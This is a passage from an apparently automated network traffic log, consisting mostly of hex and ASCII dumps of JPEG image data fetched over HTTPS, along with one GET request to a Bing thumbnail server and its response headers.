38 00 00 00 00 00 00 00 00 ff db 00 43 00 04 02 03 03 03 02 04 03 03 03 Data Ascii: JFIFHHExifMM*bj(1r2i``Adobe Photoshop 24.1 (Windows)2023:02:11 01:02:368C
2024-12-07 09:51:24 UTC	16384	IN	Data Raw: 65 2d 4d a3 a1 6b 20 d4 b0 f3 55 55 aa 74 7c 56 72 34 89 69 64 c2 e0 52 a1 dd 55 d1 a9 eb 25 67 62 ee 4d b7 e6 c5 49 0a a0 aa e9 25 3d 64 a9 77 29 58 ba 08 14 f5 7a a6 25 a9 11 b3 59 b5 62 f9 8b 91 bd 48 a6 aa a1 c5 4b 18 2d 49 96 87 31 cb 53 91 69 aa 94 f8 c5 4b 63 25 8f 8a 93 ad 47 8f 6a 90 1c d4 94 3d 00 db 4a a2 9a a2 a4 41 53 73 40 a4 c5 3d 97 d2 85 4a 57 40 46 e3 35 13 c7 9a b2 c9 4d 65 a7 71 35 72 b3 47 51 48 80 d5 c7 1f 2d 40 e0 0a a4 c8 20 51 4e 55 cb 51 25 3a 33 54 48 37 b5 4b 0a 9d b4 e8 c2 9e b5 2a 8a 86 68 95 c8 58 ed a5 4f 5a 7b 25 0b 1d 20 b5 83 19 a5 55 a1 53 14 ee 94 14 35 53 34 d6 5c 54 9b a9 19 85 24 2b a2 29 06 3a d4 4c 48 a9 49 1d aa 36 51 56 40 8c d9 a4 dd 4f d8 0d 20 88 ff 00 0d 1a 06 a3 41 cd 4c b8 2b 51 ed 22 96 80 15 97 fb b4 d6 Data Ascii: e-Mk UUt\|Vr4idRU%gbMI%=dw)Xz%YbHK-I1SiKc%Gj=JASs@=JW@F5Meq5rGQH-@ QNUQ%:3TH7K*hXOZ{% US5S4\T$+):LHI6QV@O AL+Q"
2024-12-07 09:51:24 UTC	16384	IN	Data Raw: 56 fb df 77 e8 41 fa d6 72 c8 ec af 2e ed a5 7f ef 9c 7a 53 23 8d bc bc 3e e8 f7 2e f5 da df 2e 3d 6b 9e f7 dc ea 5e ef c2 7a fe ab f1 b7 e2 9c 5a 4c be 1f b2 f1 1c d7 3a 5c f6 8d 6d 2a dc aa 4c de 5b 0c 30 0e d9 23 8e 87 3c 57 17 e1 ed 5f c4 3e 1a d6 2c 7c 41 a0 6a ad 63 a8 d8 c8 1e da e6 06 da ca 00 fb ad d9 d7 1c 60 8c 57 31 67 a8 4a cd e5 16 dd e5 31 1b 5b fc 6a d7 db 65 16 3e 44 f1 2c 7f c7 1b 2f dd ab 9c a7 29 2b bd 88 a7 18 46 32 69 6f b9 f5 df c3 ef da c3 c3 92 78 5d 5f c7 9a 55 dd 9e ad 06 04 92 69 30 79 90 dd 0e f2 05 24 18 db d5 39 1e 95 c5 7c 57 fd ad f5 dd 46 f2 5d 3f e1 e6 98 ba 45 8e dd b1 ea 17 b1 89 2f 24 3e aa 9f 75 3f 1d c6 be 67 7b c8 0e e8 d6 5d cd fc 4b 4c 4b 86 59 1a 48 9b 69 db f7 97 f8 6b a3 eb 55 2d 6b 9c 5f 55 a2 e5 cd 6f 97 43 Data Ascii: VwAr.zS#>..=k^zZL:\m*L[0#<W_>,\|Ajc`W1gJ1[je>D,/)+F2iox]_Ui0y$9\|WF]?E/$>u?g{]KLKYHikU-k_UoC
2024-12-07 09:51:24 UTC	16384	IN	Data Raw: 2c 10 d5 64 37 62 7d c1 57 2f f3 0d bf 76 98 99 7d d9 6d a1 7f 86 91 63 73 f4 5a 91 61 33 48 b8 dd f2 ff 00 75 7e ed 02 dc 8d 11 37 67 b7 fb 55 6e e2 d0 5b b2 a4 8d e5 c9 22 fc b1 ff 00 76 b5 fc 3b e1 ab cb 99 b7 a4 b1 c7 0a fd e9 65 ce d5 3f cd a9 96 76 a8 93 33 dd fe f4 2c 85 55 9b db b8 15 3c c8 d1 53 76 2f f8 62 28 9f 47 6f 3f 45 59 7e 60 20 b9 91 4e d9 0f f7 08 ef 9e c6 bb fb 1f 0c 08 f4 55 07 c8 8e e6 58 cb f9 6b 88 d5 40 e7 00 fa ff 00 3a c6 d1 26 8d b4 bf 2e d9 5b ce 8a 40 fb 7b 32 0e aa a7 d6 aa 78 bb 52 bd 92 ce 58 6d f7 2b 4a d8 6d ed b5 94 7a 63 d6 b2 d5 b3 a6 ea 11 d4 e2 7c 55 2c 93 ea cc 9e 6a ca 11 b6 ab 2f f1 1f 4e 7d 2a a6 d9 d9 a3 44 81 b2 dc 47 f2 fd e3 f4 ae 82 c3 46 83 c9 59 0a fd aa 69 3f d5 c5 1f f1 1f 4c 57 4d e0 db 21 67 ab 45 73 Data Ascii: ,d7b}W/v}mcsZa3Hu~7gUn["v;e?v3,U<Sv/b(Go?EY~` NUXk@:&.[@{2xRXm+Jmzc\|U,j/N}*DGFYi?LWM!gEs
2024-12-07 09:51:24 UTC	16384	IN	Data Raw: b4 2b 13 7d a9 57 f7 6a bf c4 5b f8 d8 fa 56 5f 82 52 ef 4a b1 d5 63 b8 55 6b 9f 37 c8 56 95 7e f6 d1 d8 fa 54 72 65 36 8f bd 2c 8d f3 48 de fd 85 12 95 90 53 8d d6 84 56 d6 91 c4 ad 24 9b 65 91 b8 69 36 fa f6 1e 82 ad cd ab da 68 7a 7b 4a 62 8e 5b e9 e3 db 14 7f f3 cc 7a fb 66 b3 f5 8d 5c 5a db c7 00 8b 71 4c ee 5f 73 5c cc 92 c9 3c cd 2c ed b9 a4 e5 9a b3 45 bb 6c 89 ee 6e 25 ba b8 69 e5 f9 8b 31 6a bb a5 dc 47 0a c7 22 7c c6 5c 86 56 fb b9 ff 00 11 59 8b 3a 06 f9 17 f8 73 5a b6 16 12 dd c3 1b a4 b0 45 1b 36 77 48 df 33 7d 29 31 47 7d 09 6f 27 71 6f 92 b1 79 7b 4f f1 7f 2f 43 46 8e 92 3a b2 44 b2 49 f2 92 de 5a ee e9 cd 5e d3 5a d2 da e3 cc 9d 6d a5 1b b0 de 64 7b fc bf f6 80 ae 92 ce e4 58 68 ad 79 04 52 41 6e ea 43 34 8b b5 e4 0d 91 95 ff 00 64 d3 d1 Data Ascii: +}Wj[V_RJcUk7V~Tre6,HSV$ei6hz{Jb[zf\ZqL_s\<,Eln%i1jG"\|\VY:sZE6wH3})1G}o'qoy{O/CF:DIZ^Zmd{XhyRAnC4d
2024-12-07 09:51:24 UTC	16384	IN	Data Raw: bb 8a f4 a8 62 14 ad 19 fc 47 8b 8c c1 3a 7e fc 35 8f e4 60 3b 06 5f 2d d9 bf d9 6d bf ce 88 e4 09 fe c9 e3 6a d4 6a f8 5c ee 55 a6 34 d8 6d 8f f3 47 d2 3f f6 7f 1a ec 48 f3 2f 62 4b 95 0d 1c 92 c6 bf bc 6f bd f3 56 52 ef 2d 92 dc d5 fd e3 6f c8 df 37 f1 2d 46 91 c1 25 c4 66 5d cb 1e e1 e6 6c c6 ec 7b 56 91 ec 63 51 5f 52 a7 99 88 59 0a ff 00 f1 35 af e1 9d 56 e2 c6 4f 32 38 95 8c 6a 47 98 cb f3 47 bb d1 bd fd 29 b7 da 65 9f da 33 14 bf b9 56 f9 76 fd e9 3e 9f e3 5d 75 85 95 b5 d7 86 ed 6d ae 22 81 ad e3 63 e5 b2 fc af 1e 7d 4f a8 a7 27 ca f5 0a 50 72 47 32 d7 b0 0b e9 2f 2e 20 dc 1b 25 62 dd b7 73 9f e2 35 42 49 ae 2f ae 3c c7 6d dd b7 7f 0a 8f 40 2b a0 bc d1 ed 62 99 99 e2 f3 50 fc ab fe c8 ff 00 3d eb 36 fa 04 b4 99 bc 87 6f 9a 3c c4 dd 97 ff 00 d5 53 Data Ascii: bG:~5`;_-mjj\U4mG?H/bKoVR-o7-F%f]l{VcQ_RY5VO28jGG)e3Vv>]um"c}O'PrG2/. %bs5BI/<m@+bP=6o<S
2024-12-07 09:51:24 UTC	16384	IN	Data Raw: 5f dc ad cc 2b 19 49 2e e2 6f 99 5c 9e 03 63 f8 47 e8 6b b3 f0 e8 8b 5c d1 e7 8a 09 60 be 6b 18 c3 c1 3c 13 a2 c9 d7 a7 3d 78 eb 9a e3 6d be 1e cd 1c 78 b8 d5 e0 f2 e4 6c 2f 91 11 3b b3 fe f1 15 d1 78 63 4a d3 b4 16 8f ec f7 d7 32 37 4d cd 85 5c 74 39 55 fe b5 85 5c 12 96 b1 7a 9d 54 31 b2 8e 95 23 a1 d1 43 aa df 6a ab 16 99 aa 59 ac 97 31 c6 63 69 d5 7c b7 b8 0b c2 a9 43 f7 1c 0e 87 f8 ab 96 92 d5 2c 75 06 b9 f2 96 f2 dd 9c 49 04 aa a7 cc b5 c1 e4 32 1e 4f 4e 9f 51 e9 5d e6 95 e2 1d 2e 4b 19 6c b5 8d 2b 4f be 89 57 c9 f3 24 83 6c ca 9e 9b d7 07 f1 ed 5a 72 69 1f 0f fc 4d 0f 9f 03 5d e9 b7 9b 76 7d ae 3b 91 22 b0 fe ec 8a fd 71 eb 9c d7 24 f0 b2 a6 7a 14 f1 31 9a 47 96 ea 97 36 da 85 9c d1 6e 8f ca 97 25 76 b6 e5 84 e7 76 31 fd df fd 06 b8 e9 22 41 e6 87 Data Ascii: _+I.o\cGk\`k<=xmxl/;xcJ27M\t9U\zT1#CjY1ci\|C,uI2ONQ].Kl+OW$lZriM]v};"q$z1G6n%vv1"A
2024-12-07 09:51:24 UTC	16067	IN	Data Raw: 7d f8 fd 51 bd fd eb cb 92 57 3a 25 07 14 99 93 78 a9 aa 58 cb 64 d1 6e b9 91 70 c8 d1 fc d3 01 d4 63 aa b0 ff 00 26 a8 e8 fa 8b cb 34 56 12 4f f6 9b a8 a2 2d 12 c9 ff 00 2f 90 03 b7 68 6f ef a9 e3 de b6 bc 41 61 25 ab 2e a1 1c ed e7 5b b0 3e 6a af cd b3 f8 58 e3 ef 63 a1 f6 ae 73 c5 da 72 2f fc 4c 22 8b cb 86 6b 9d f3 c7 1b 73 63 3b 70 27 8f fd 86 3c 37 fb d4 b7 d1 97 19 2d 0a 3f 14 34 a0 fa 3a ea 16 d1 32 b5 b3 09 37 2a fc db 07 0c a7 dc 0e 7e 82 a2 f0 06 a1 2c 36 71 5b de b4 11 da 48 c5 15 95 be 59 9c f4 0b e9 9a dd b7 d5 84 d3 35 86 a3 07 ee a4 da 92 b2 e3 6c 6e 3a 31 f5 5e 84 1e e2 b9 dd 43 49 9f 49 bc 5d 1e 3d cd 1c ec cf 69 b5 4f 94 ae 3e 63 b4 f4 3d 77 0f a1 f4 a6 a5 75 c9 22 f9 45 f8 bd a2 5f df da 36 a3 a3 3b 36 a7 63 01 9a 48 d7 ef 6a 56 db 30 Data Ascii: }QW:%xXdnpc&4VO-/hoAa%.[>jXcsr/L"ksc;p'<7-?4:27*~,6q[HY5ln:1^CII]=iO>c=wu"E_6;6cHjV0
2024-12-07 09:51:24 UTC	16384	IN	Data Raw: d1 36 df 33 f0 fe b5 05 9c 5f 6e d4 25 42 ad f6 58 b8 6f 31 bb 8e 9d 39 e6 a9 5b 52 7b 58 a9 e2 18 e3 b6 ba 8e 70 ad 14 72 c6 43 2e ed db 4f d4 75 cd 50 72 04 6b e6 ab 48 aa bf de fb c6 b7 fc 6d 6d 02 fd 9a 28 b7 79 7b 71 b6 4f e1 27 b2 e3 d2 b1 a1 bd 78 ed 7c 81 02 bb 6d c2 b4 8b f3 46 6a a2 ee 8c aa 2b 4d a2 3f 31 fc 96 49 97 c8 0d cc 6c bf 79 bd a8 85 63 b6 92 37 9d 9b 76 dc af ff 00 5e a6 57 95 17 6f 9a ac 55 b1 f3 7c cc df 5a 64 85 20 93 cc b8 83 cc 6f e1 55 6f 95 6a 91 0d 11 bc e8 17 61 45 68 99 b7 fc ab f3 37 af 34 d8 e3 79 fc cf 2d 5b ca dd 9f 95 4b 2a fb 52 48 d1 cb 23 16 95 a3 56 5f f8 0a e2 a7 b7 9e 41 a2 cf 00 f9 55 58 16 6f ef 7f b3 55 6b 22 6f 7d c6 59 a8 59 bc c4 f9 43 30 45 6f bb f8 d7 a8 7c 35 d1 ae 34 db 5d 4a 42 b2 47 71 75 69 fb 86 8f Data Ascii: 63_n%BXo19[R{XprC.OuPrkHmm(y{qO'x\|mFj+M?1Ilyc7v^WoU\|Zd oUojaEh74y-[K*RH#V_AUXoUk"o}YYC0Eo\|54]JBGqui
2024-12-07 09:51:24 UTC	16384	IN	Data Raw: cf 90 ab 16 12 08 97 ee e3 a0 3b bb 57 6f a6 c4 2e 16 7b d4 81 9a e1 b0 66 8d b3 b9 48 f4 5e 9b 4f aa d6 5e a5 0d 85 ee eb 8f b0 c9 ba 4c ac 90 2c 9b 55 8f a9 3f d2 aa 15 22 f6 44 ce 8c 92 b3 38 3b af 0c 5c 26 93 15 c6 99 aa dc b5 c3 7f ac 8d a3 d8 8d ea 37 83 c1 1e f5 95 1a ea 3a 35 d6 cb b8 a7 b5 69 39 69 1b 2d 1b 1f 4c f2 2b d2 a4 d3 64 6d 35 64 11 7d 9a 6f f9 6c ab 96 8e 4c 1c 81 cf dd 3d b3 de a8 fd 9b 5d 13 33 ac 6a ad 2b 1f dd b2 87 5c 76 ce 78 aa e6 d0 c9 d1 5d 8e 7b 49 be d4 96 d6 6b 97 82 3f 26 5f f5 6c ad b9 5b df eb 4e 7d 46 7d 36 d6 29 a4 b3 b9 b7 89 94 08 e6 65 f9 7f 31 c6 6b 73 52 8b 54 55 fb 44 f6 3e 5b 46 c0 79 9e 58 29 19 3d 0e d5 ed fc a8 d1 7c 39 e2 39 55 d2 f2 ce 79 ed ae 98 fe f6 26 0e 8d 8f 54 3c 63 f9 51 ed bb 07 d5 ee b6 39 bb 8f Data Ascii: ;Wo.{fH^O^L,U?"D8;\&7:5i9i-L+dm5d}olL=]3j+\vx]{Ik?&_l[N}F}6)e1ksRTUD>[FyX)=\|99Uy&T<cQ9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	49740	150.171.27.10	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:25 UTC	346	OUT	GET /th?id=OADD2.10239340418552_1AAPCBWXWYRQF23F9&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-12-07 09:51:25 UTC	856	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 522409 Content-Type: image/jpeg X-Cache: TCP_HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: EE8AD19652A6496AA9315E12AC7BE771 Ref B: EWR311000103011 Ref C: 2024-12-07T09:51:25Z Date: Sat, 07 Dec 2024 09:51:24 GMT Connection: close
2024-12-07 09:51:25 UTC	15528	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 00 da 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 00 00 00 00 60 00 00 00 01 00 00 00 60 00 00 00 01 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 34 2e 31 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 30 32 3a 31 31 20 30 31 3a 30 33 3a 33 38 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 03 00 00 00 01 04 38 00 00 a0 03 00 03 00 00 00 01 07 80 00 00 00 00 00 00 00 00 ff db 00 43 00 04 02 03 03 03 02 04 03 03 03 Data Ascii: JFIFHHExifMM*bj(1r2i``Adobe Photoshop 24.1 (Windows)2023:02:11 01:03:388C
2024-12-07 09:51:25 UTC	16384	IN	Data Raw: d2 30 ed 52 62 85 5c d0 04 78 a3 6e 38 a9 50 51 8c 52 b8 59 90 e3 da 97 69 db 52 d0 46 68 b8 38 91 aa e6 9c ab e9 52 05 fc a8 5f 7a 4d 95 14 33 6d 37 1f 35 4a ca 29 31 42 60 d0 cc 35 2b 0c 73 52 ed 23 ad 26 d0 69 5c 39 59 1e 29 69 cc 31 d6 93 14 f9 84 d5 86 fb d0 a7 b0 a9 36 d3 76 9a 39 87 66 81 58 f7 a5 53 f9 d2 aa fc b4 6d c5 4e 85 06 45 1b 85 0b 48 c3 1d 28 0b b1 ea e0 2f 14 ed e3 db f2 a8 94 53 f6 e1 a8 d0 69 b1 ea c0 f1 4b 90 1a 98 a3 bf 7a 31 ed 4b 95 0f 99 a2 5d c3 b7 de a1 64 ed 51 b2 9a 30 0d 4d 86 e4 c9 f7 8a 72 c9 8f bb 50 2a e2 a4 45 a9 e5 45 c5 b2 42 e5 9b 27 ad 2e fc 53 3e 4a 6f 15 36 2a ec 91 79 6c d3 98 61 aa 1c e2 86 77 3f 4a 7c a1 cc 4f b3 2b c7 4a 8d 94 9a 16 52 38 ed 4e f3 29 59 95 cc 98 cd 87 76 3b d0 d0 93 4a ef 9e 69 9b df f1 a7 a9 Data Ascii: 0Rb\xn8PQRYiRFh8R_zM3m75J)1B`5+sR#&i\9Y)i16v9fXSmNEH(/SiKz1K]dQ0MrPEEB'.S>Jo6ylaw?J\|O+JR8N)Yv;Ji
2024-12-07 09:51:25 UTC	16384	IN	Data Raw: 9d 8a 5a 2e 03 14 50 c3 34 fc 7b 51 8e d4 5d 80 cd be 94 62 9f 8f 4a 31 ed 4b 98 2c c6 ed a2 9f 8a 4c 62 8e 60 1b 8f 6a 18 0a 76 3d a8 c6 69 dc 06 e3 e6 a5 c5 39 45 18 a5 cc 03 54 7c d4 62 96 9d 47 30 0c db e9 4b 8c d3 b1 ed 46 3d a8 b8 ec c6 e3 da 8d b4 ea 31 ed 4a e2 1a cb 46 3d a9 d4 30 a2 e0 37 1e d4 63 da 9d c7 7a 55 14 5c 2d 71 aa 3d 69 19 69 f8 a3 14 5d 8e c3 71 43 2d 3b 14 62 9d c4 37 6d 0a b4 fc 7b 52 74 a5 71 b4 26 3d a8 c7 b5 3b 1e d4 28 a2 e2 13 14 62 9d 8f 5a 31 48 ae 51 bb 73 4b 8f 6a 76 3d a8 c7 b5 01 ca 36 85 14 ed b4 aa 28 15 86 e2 8c 53 b1 46 31 40 f9 44 51 46 3d a9 71 4e da 28 28 6e 29 57 9a 5c 52 e3 14 00 dc 7b 52 e2 96 95 68 01 31 ed 46 3d a9 cd 45 00 37 1e d4 ea 28 c6 69 5c 01 7e ed 18 f6 a5 c5 25 1b 00 52 e2 9c b4 71 48 04 c7 b5 18 Data Ascii: Z.P4{Q]bJ1K,Lb`jv=i9ET\|bG0KF=1JF=07czU\-q=ii]qC-;b7m{Rtq&=;(bZ1HQsKjv=6(SF1@DQF=qN((n)W\R{Rh1F=E7(i\~%RqH
2024-12-07 09:51:25 UTC	16384	IN	Data Raw: b6 90 f5 3d 43 0a ea 34 1f 8c be 39 69 a5 b0 bc b3 dd a8 69 f6 df 69 8a 79 31 fe 94 83 a8 38 e1 94 af 7e a2 bc b7 c7 d6 fa 86 9e cb aa 5a 6e 5b 6b 96 c6 e5 5f 97 3f 8f 7a 77 86 ce a7 6f 1c 1a 8f 89 67 bb 8e da 35 ff 00 44 93 77 cb b1 8e 1d 4f 7c 11 59 fb 38 28 7b 48 f5 fc fd 0d e3 88 ab ed 3d 94 ef a7 5f 2f 5f c8 f4 df 8c 7f 1f 0f 8a b4 fd 36 c8 e8 70 da df da a9 ff 00 49 f3 f7 ab 6e 1f 71 bb e3 3c 83 5c af 86 7e 37 6a 33 58 c7 e1 fd 6f c3 31 ea 53 2b 62 d2 ee 39 ca dc c2 7f bb f3 70 cb ec 6a 38 fc 1b a7 dd fd b2 4b 6b 68 5a 19 18 bc 53 b7 dc d9 e8 79 e3 eb 5c 1f 89 3c 39 a8 69 3a f4 6f 2f 9b 01 fb f1 4a bf c4 07 a7 b8 ae ac 34 e9 ce 9d a3 d0 e3 c4 ac 4d 2a a9 c9 e8 ff 00 23 d8 97 c5 7a 54 d2 47 fd a7 bb 4c b9 6c 79 71 ce df 26 7f d9 71 c6 0f bd 16 3a ac Data Ascii: =C49iiiy18~Zn[k_?zwog5DwO\|Y8({H=_/_6pInq<\~7j3Xo1S+b9pj8KkhZSy\<9i:o/J4M*#zTGLlyq&q:
2024-12-07 09:51:25 UTC	16384	IN	Data Raw: 38 71 53 85 3c 5a a7 0f 87 a9 f4 07 80 75 8d 7e 0d 25 7f b4 6e 63 9f 45 92 4d 8b fb c1 22 c2 7a 61 d4 8c 60 d5 4d 6b c1 66 f3 4f be 8b 4a dd 67 aa 45 e6 5f da 5d da 7c b1 dd 6d 3b 8a 34 7d 15 87 4c ae 07 eb 5c 3e 8f e2 9d 6d 75 69 2f 11 a0 b6 86 7e 26 b4 f2 bf 73 30 ee 19 0f 15 eb 7f 0d 7c 49 a7 6b da 7f d9 34 f9 7f b3 ef ed be 78 e2 95 b7 27 fc 01 8f 38 f6 35 c7 88 8e 22 93 f6 91 f9 d8 f4 f0 f3 c3 d5 8f 23 f9 5c e2 ec 7e 2c 5b 5d e9 fa 75 e5 cc b7 77 57 0b 13 0b dd d8 85 23 c7 42 08 fb c7 35 87 f1 12 4d 33 c6 ba 2c 5a af 86 a7 69 6e 11 bf d3 b4 99 db e6 62 3f e5 ac 0c 79 dd 8e ab df a8 f4 af 41 f8 a3 f0 b3 c3 de 31 d3 6e a4 d3 e0 5f 0f 78 a9 57 7c 7e 57 cb 67 a8 11 fc 32 20 e1 58 f6 75 fc 6b c1 34 38 6f ec 35 07 b4 b9 8a 7b 1b eb 59 0a 6d 65 da ea eb d4 Data Ascii: 8qS<Zu~%ncEM"za`MkfOJgE_]\|m;4}L\>mui/~&s0\|Ik4x'85"#\~,[]uwW#B5M3,Zinb?yA1n_xW\|~Wg2 Xuk48o5{Yme
2024-12-07 09:51:25 UTC	16384	IN	Data Raw: 9c 3a 96 96 ca 91 c9 e5 a8 66 8e 40 71 d4 10 43 67 bd 79 d5 25 2c 34 93 52 bc 7a a3 d9 a7 4a 18 da 72 4e 9d a7 d1 9e 29 6f 79 e6 6d 49 22 dc 8a d9 ff 00 6b f3 a8 6e 63 88 48 de 5a ed f9 b2 b5 e8 5a b7 c3 0b d4 be 92 0b 1b e8 fc bf fa 6a bf 3a 8f 5f 97 ef 7d 45 62 7c 44 f0 1e a1 e1 5d 06 db 59 f3 da 5b 79 e7 36 b2 ee 5d ad 1c b8 dc 36 ff 00 79 48 ef d4 57 75 3c 5d 09 49 25 2d 59 e4 d7 c0 62 69 41 ca 51 d1 1c 92 aa 0d c7 65 47 8c b3 1a 72 b6 17 fb a5 a9 18 84 5c 6d ae c3 cd 37 34 bd 69 cd aa e9 fa bc 0b a8 59 af 2a b2 fd f8 ff 00 dc 6e ab 52 6a 9e 19 79 6d da f7 c3 b2 fd b2 d9 b2 ff 00 66 6f f8 f8 8f fe 03 fc 78 f5 15 89 0b 01 cb 74 ad 2d 0f 5c bf d1 66 4b 8b 66 dc bb be 55 ff 00 3d 2b 9e 50 94 5d e9 ef db a1 db 0a 94 e6 94 6b ed df aa fe bc cc a4 90 96 54 Data Ascii: :f@qCgy%,4RzJrN)oymI"kncHZZj:_}Eb\|D]Y[y6]6yHWu<]I%-YbiAQeGr\m74iY*nRjymfoxt-\fKfU=+P]kT
2024-12-07 09:51:25 UTC	16384	IN	Data Raw: e4 74 76 da 8b b6 8b e6 41 14 6b 70 b1 61 96 36 dc aa 00 e3 e9 9a e4 97 5f d5 12 e1 6e 12 5f 2c ab 7c b1 af dd e7 d7 d6 aa c9 77 78 6d da 01 2c 8b 14 bf 79 7f bd 50 a5 be 17 0e dc d6 a7 35 cd 9b 9f 15 ea 13 2e 03 2c 4c bf c4 ab f3 56 3d c4 b2 cf 33 49 2c ad 24 8c df 33 37 cc 69 1a 25 5d c3 6f bd 3e 6f 29 36 ec 95 b0 ab d7 f8 68 d8 35 7a b2 ab cc 91 c9 b7 e6 63 5a be 1f d4 31 fb b9 19 99 63 fe 5e 95 4a 6f dd f9 60 af de fb ad 4c f3 8c 6c de 5e e5 66 5c 6e a9 94 53 43 8c b9 59 d4 e9 f7 d2 c2 cb 25 9c fc ff 00 9e d5 d3 e9 7e 2a b3 bc 55 83 54 95 6d ae 37 04 56 6f b9 27 d4 ff 00 09 af 38 b1 bb 11 c8 b9 5f 97 fd af 5a dd d9 65 7f 24 51 08 b6 ac 8b fb c9 15 8b 6d c0 ac 9c 6c 74 d3 a8 da 3d 12 64 cb 49 65 3b 33 fc c0 47 b7 ee 60 fb 9e 95 81 a8 5b 9b 59 a6 8a 4f Data Ascii: tvAkpa6_n_,\|wxm,yP5.,LV=3I,$37i%]o>o)6h5zcZ1c^Jo`Ll^f\nSCY%~*UTm7Vo'8_Ze$Qmlt=dIe;3G`[YO
2024-12-07 09:51:26 UTC	16069	IN	Data Raw: b1 83 2a f3 fb c2 78 1b 14 70 7e bd ab cd bc 33 a6 49 7d 6f e4 23 6d 2b fb e6 65 6d bd 78 c6 7d 6b ac d2 b5 c4 b4 d7 96 d2 ff 00 e6 b7 81 42 c5 23 2e ed b2 01 83 cf f7 4f 4a f3 f1 50 6e ea 27 af 81 a8 95 9c f4 3d 12 4b b8 35 0d 0f 60 81 9b cb 6f 2e 5f 2f fd 5d d2 63 18 23 f8 5c 63 ad 66 68 b6 96 9a ac 8b a5 5b b3 7d 9e 49 36 2a ca df 35 bb 8e c7 3c f5 e3 3e 95 4a c5 e4 b3 b8 96 f2 c9 7c c8 65 51 e6 45 1b 7c ad 9e a3 1d 9b fa d6 bf 8d ac e4 8e e2 3b df 2e e7 4c bc 93 69 92 ef cb f9 23 c7 46 90 2e 7e 99 fc f8 af 3a 3a 3b 1e b3 da f6 21 d6 3c 2c f6 b6 f2 d9 cd 03 39 8a 40 25 89 9b e7 d9 d7 e5 3e de bd eb 9b d5 90 69 5a a4 52 e8 7e 64 71 f9 83 cd b4 fb cb 1c 83 a3 80 7b 13 d4 0a ec ad bc 4b a9 ea f2 59 d9 dd 5b 41 1d cb 47 98 ef 63 8c ff 00 a4 63 f8 5f b7 e5 Data Ascii: xp~3I}o#m+emx}kB#.OJPn'=K5`o._/]c#\cfh[}I65<>J\|eQE\|;.Li#F.~::;!<,9@%>iZR~dq{KY[AGcc_
2024-12-07 09:51:26 UTC	16384	IN	Data Raw: b9 b3 93 cd 95 77 44 c0 b3 36 57 72 03 d7 02 9b 7e 96 d7 2b 22 1f dd 86 61 f3 2b 6d dc 41 ed 53 cb 7d 8d 79 ac 33 ed 6b 6f 34 73 3c be 51 6c 7c ad 9f 94 f4 ff 00 3d aa 2f 34 2d e2 f9 8b 26 36 94 f9 b8 da 7e 9d c5 3a 4b 50 6d fc b4 65 c2 ae 15 5b d2 ab 6e 90 47 12 95 dd b5 89 69 19 4b 3f 3c 6d 24 f6 14 b9 41 ca e6 8d b5 fc eb 22 bc 1f bd b6 dc 15 9b ee b2 91 5d d7 c3 3d 48 49 ac 4b a2 5c 4e ad a6 df 44 52 78 25 fb bb 4f 52 a7 f8 58 57 9e db ac 93 c6 b1 7f 79 be 5f e1 6a b1 33 dc e9 4c b3 ad 9c 92 c9 b7 f7 4d 1b 05 7c f4 ff 00 26 a6 a4 79 a2 d1 ad 1a 9c b2 4c dd 40 34 7f 15 5f 59 c1 3b 79 76 d2 62 36 65 ff 00 58 9e fe bf 51 de ad ff 00 6b 98 ee a7 75 4f 2d 59 72 d1 2b 1d ac 7f d9 ec 18 d7 39 26 a8 97 2d 63 a8 47 2b 48 cb fb b9 e3 db f3 42 87 fb d9 f4 6f e7 Data Ascii: wD6Wr~+"a+mAS}y3ko4s<Ql\|=/4-&6~:KPme[nGiK?<m$A"]=HIK\NDRx%ORXWy_j3LM\|&yL@4_Y;yvb6eXQkuO-Yr+9&-cG+HBo
2024-12-07 09:51:26 UTC	16384	IN	Data Raw: 1f cc 7b af b4 db 37 d9 a6 b4 c9 89 e3 fb bc 76 3e b5 51 5a 11 74 cb 9e 1d b7 49 24 f2 51 9a 48 d7 3b b7 7a 7b 67 b5 74 b6 fa 2e 9f 07 87 64 9f 4f b3 91 6e a7 9c f9 8b e7 94 65 00 7c bf 2a f1 83 9e b5 9d e1 d8 8b 79 d2 fc ab 24 8c 0e d8 d7 62 f1 e8 3a 0e 6b 42 ee 4b c8 ac 64 f3 27 dd e5 cb bd 59 58 2e e4 3f c3 c7 a5 69 18 ab 5e c2 32 b4 5d 47 57 d3 37 5b f9 52 ad ca 48 df bd 5c 6c 90 74 cf 7f e1 e3 eb 5d b2 6b d1 cf a7 c9 61 79 a6 46 d6 d2 aa c8 b7 31 4f f3 2b af 04 85 6e 99 e9 9a c4 bc 8f 4e d5 2d e2 9e 3b 69 52 49 71 b6 e6 09 06 e6 3d 0a 30 3f ce ae 68 7a 3e 89 